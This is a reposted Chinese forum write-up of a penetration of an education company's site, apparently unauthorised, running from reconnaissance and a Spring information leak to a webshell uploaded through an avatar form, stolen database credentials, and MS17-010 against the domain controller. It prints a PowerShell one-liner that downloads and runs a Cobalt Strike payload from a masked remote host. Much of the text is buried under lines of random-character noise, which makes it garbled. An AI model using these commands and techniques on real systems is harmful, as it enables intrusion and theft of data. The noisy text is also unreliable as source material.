|
1 P0 u4 K2 E3 @ b" \
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
0 n" }5 |$ j( s ! g6 h( A+ E4 s, Z
1 D: \3 X5 B7 G0 z) h: F
4 O) I. I& T" M* Z
4 |4 w4 f/ b: }$ b# q3 w |+ U
2 M/ _4 T& ?0 Z8 z8 ~
正文4 h8 n5 H( p9 S) Z$ x8 i
$ o: x: n% R( ~4 T( n% w( J- a! H
3 Y# u3 D0 E4 B- U9 z- }1 U0 ]
# i! Y( r5 x2 a3 {5 j* {6 a$ l7 p " W& n! e/ L# w4 }7 i6 K
" N5 q. g8 O* m; K% v o8 z: d/ Z
目标:www.xxxx.com(一家教育机构)
8 L6 K9 l* [6 v) R; Q; [! o打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
" Q; M9 a9 x( Y4 u) N& \4 E P$ x
8 A( b) @& \! F, V, U! ^+ M2 A
. W: s; Z5 ~% k: C5 n  : f4 b9 v0 B7 o* {4 S
. U E5 |" f5 E! W
) Y3 N1 ]) e2 P' [& M 进行了简单的信息搜集
0 T O! u4 a/ N: O
! s- w6 f$ O; ^1 n/ h' S' Z
! \$ V4 ~3 D) t" r- N4 ?
B# D* ^. v5 v1 w1 d6 @, }
) I* R! m+ S: | S0 Y- Y6 ? 子域名搜集* {1 A; }7 l' d, g3 y) ]
/ q$ a- x1 n1 w9 [
$ w" S+ N6 \% ~' x0 g2 {5 v
 6 ?5 I) E2 f- i& O* x
$ _$ P. {. Z6 H- u/ r: v7 j
) g: B( W: T- W% }5 u3 H! i4 Z" q fofa找资产
' }2 b/ y: K1 R7 n1 v7 z
2 C& p- R9 B5 ?' z
! x% v: t- V9 B: C, P8 U+ s4 R
9 {) B8 \, i* F1 A4 y' q3 t- U- O. r1 x
, m) M# S0 a7 p8 ^" x7 t5 B+ R6 X3 A# \  + R1 I' L% t" y ~
$ P( L; G, S! ?# ~0 |- r
4 P4 D$ w" g* E4 c% M2 Z) A
一共七个资产。去重之后只有两个。
( l$ ^1 j) o5 b
% w3 a1 \- m- l' [( A# T* L- P$ d
7 d' M3 B4 s+ p6 F6 N
, \$ K" x" Y& c( a) B4 y
目录探测
/ o+ s% |/ L6 X; T$ Q- ?. }, O& Z
# @7 u4 \0 h9 U' A
* V! L0 k9 U2 b; I$ G' F 
$ A0 u$ W$ p; K. r( h
" s: m0 y7 o0 y/ ~; Y# Z& {; Z+ x5 e% O4 f- L8 D
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
. r0 W8 G4 T& o) f/ R3 a/ q# P
$ C( @' a& u9 q+ C. c9 S( E5 A) x* m& y1 F5 G9 B, f
; Q4 v3 Y- c; B/ @. |% n9 H
K% z; }; m+ R* q1 ~# Y 我又尝试了通过修改返回包来绕过登录界面
+ L+ O* k. E, ` \# k/ f
2 Y; W% [2 c! l1 _4 C) b
2 B9 U$ H1 ^( I! E 
5 s8 J0 q" T# Q4 y8 X0 _ % @ P/ k$ L1 H" \) o3 W7 |
9 R0 L3 W% v: ?6 t% g/ c
还是不行,尝试注入无果: Q$ I% z7 B6 K# x& e, H, U
/ }' \# \. v1 b) Z. _
/ x T9 K4 K+ m8 B5 ?# d
 k* U0 B/ ~( R( w
9 o$ O# J8 x" b) m) a: r; a0 Z* H
不过我目录探测出了一处Spring信息泄露
! _' W% h }( q) D
0 D, q1 d& C0 v7 p7 b& N; z/ }/ }
; T8 y- A: z; F+ g( {
$ Q+ Y& ~8 \/ @" }' {
5 Y5 ~! i' Y6 j: |; e+ k6 O: I  ) R9 L- O: R& @+ A* n' O( z
& P4 p% j3 b! k. o" Q+ h
. ~2 G+ t* W( z( e/ t, I 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录3 m g( [4 C9 `4 r. C
, ]" W$ s) Z3 y% n# D* ?
' z; Z& u6 G" V2 i  ) U; a; r3 m: v) Q1 n
4 Q1 L$ \3 w- |( B |
% ~# N/ Q$ c- c" K! d 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。) V( w9 }4 i9 M) A) c" r8 ?
1 @* P' F) Z, U
1 h7 [% E7 }7 _2 B, ?) E
; S: `$ K2 U/ }3 e6 n1 Z
7 W1 J3 f: ?, d+ T; ]# b3 Z: I: u* K5 p5 o
获取有些师傅到这一步就手机抓包电脑测了。
3 F$ ~. R1 j/ W
8 |! X. M/ { p& W
% b. K1 G1 h; f' z4 B" v* y7 M Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
3 [) x: }& `5 ?/ P9 g- s0 e& W9 s' ?
# a5 b. w. y$ [( Q d: y3 E+ R' w+ {+ g
其中在一个公众号发现了小程序,可以进行注册。
5 K' o1 m u' b0 j7 X
8 i8 q" v& p% e) x( W) h; r' g' W3 b( G% r& O; ^* N
看到了头像上传,尝试上传获取WebShell
4 ~! F% r% s# ` o+ v# z
5 W8 Q3 y8 [4 t& @
4 D/ Q& @% g6 W 
5 c; w5 l0 w# u) B- |& }) m
7 y' e; Z, j: }* N. R
. ^) B+ B6 {; K3 J8 W6 P 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问- N5 F) O0 t$ W8 _& a, H0 |
y: x# |- Y9 j9 ^! {5 @6 r w& |: x4 i, L1 k$ m
 9 q; R9 D0 S( p- @0 l- _
) H8 e# m* d7 K/ Z- i7 d/ B
! E* O( z: `! Y9 N 然后上了大马
' V4 n0 a3 b4 w D; K 7 X: R8 k( j8 ?' i# ~; c' g
9 h, E4 V' a: t5 F  , b$ P6 i& Z# l! I" J
. {$ d# h4 E( B) }# L5 k! g, ]. J. q7 r
5 ]- g, }7 x2 ?- l/ Z  % d. c/ [* H1 `5 g S1 L6 U7 H
$ x+ O) X% n `: t7 v2 s. \0 T, A
5 ]( M2 a6 V: V( C B% R" }
通过翻找文件发现数据库账号密码7 S" f5 `/ B# \5 T5 D+ _/ @: j; x
; F. q& w( E; b6 l/ b. J% _! J. J" u8 m/ J
 ; T2 h5 [% {! _9 m) R$ U
8 P# V# Y' @' n. g# V) }; d2 d" ^5 r( u# c# R! q, ~/ t) h3 Y
--内网渗透) X1 s) r" R4 W
3 @) T: J( h8 p5 T
+ |" t$ b# A+ l8 U 直接通过powershell执行 cs上线
Y; M. q) n* E " h$ J: h9 u7 h/ m: p
( s" v8 w2 j$ i# ~ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
# r# @0 D; w1 k1 A0 C6 r" q $ N8 z( R7 x4 f% a( u7 \
6 L6 `2 [2 G* W' H R# h6 x, k  1 u3 H2 d6 [) P& F* d- U+ U: I: w
9 [4 D3 y" [. L* P7 j, F7 d8 x7 B5 g$ z/ |7 c9 N
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破- c8 I* Y7 D# q& b: a/ w3 p
; O4 D. I6 m; _( f5 |% l3 i: A/ d" g1 Q) z) N
 9 f' M! U. K7 J8 ?8 }( O
3 e) v3 |- r6 d* x7 M' T. Q l" B l
' m/ q2 m7 j7 p7 t 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
y; ~; y( B8 l K
1 o% s: [& {$ u1 E: j
( `, A* Y. X7 x* J
( I/ t, y8 L8 L0 h: t, e# T% y
; n8 M' ?$ h6 M! e
6 d7 I& H5 z" N# G" G 
% d0 U$ c) u3 \- B0 M9 T& c3 N7 d6 R 1 \8 H- F# P* ]2 {
5 r- H- v9 e( W9 W# E
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
8 @3 U+ x1 |( ?/ J( |$ q
. P% x1 \/ R! @/ Z( M1 j! x; N
6 Q* }- n! |' \/ m A! B7 S p5 D
$ F; @+ c3 @7 T
# \: I' {$ Y. H* T% w: v6 K  3 ]1 s2 D, \; ?
2 A3 Y% q/ d) F8 d1 c, ]4 U
, {2 S0 W ` U- c8 n, h( v( z, m
) f; k2 _8 u) N7 w+ H
; z# J: ~% O- L( N
" p3 w; c; N* i" O
8 V e0 Z1 L7 ]9 H- i$ g9 O3 O
5 C! z* e! ]# b
( S6 A; u/ h* ?& j
% x' H$ q! }( i$ T3 o
5 L" w1 B" b) R$ Q0 _1 S, P 小结: E4 J" d1 ^, l+ s& \) ]( f2 i
0 ^; T% O: L' g) H- V5 ] z [, L2 [7 ^3 g. _
: A: q* o9 u0 r% R3 s/ ?
3 P9 ~, J3 g" L8 ?1 q3 {: \( `9 M' t; B
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
V; w4 M7 D$ P( X5 a* ~
8 w1 i1 d/ e6 @7 O
/ \5 g* B% ~( @ n- b9 l0 L& C : y( i% t, C, @4 B
" Z2 W- q! ?8 D3 z! N+ {
) N c: V ]2 h x$ ` i/ K- ~
- 9 M* P# G7 @. t( _
: @: e3 q3 P! M
, J1 a, r) v. r7 ~* {8 x
-
' |+ _- {5 a1 z0 D/ i0 T$ o
6 s y! M' K& E' o
3 D& [6 e& ?3 F
8 K, s4 h7 k6 Z9 {6 s+ n" ^, l8 w- U7 J
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
) p; e' T+ D( N4 `3 G$ [
0 [* [& u% m+ s% i# s" H- p h4 T8 {+ `- Z
/ g w- V- q( X2 f D* B | 
发表于 2024-3-1 19:41:32
收藏
支持
反对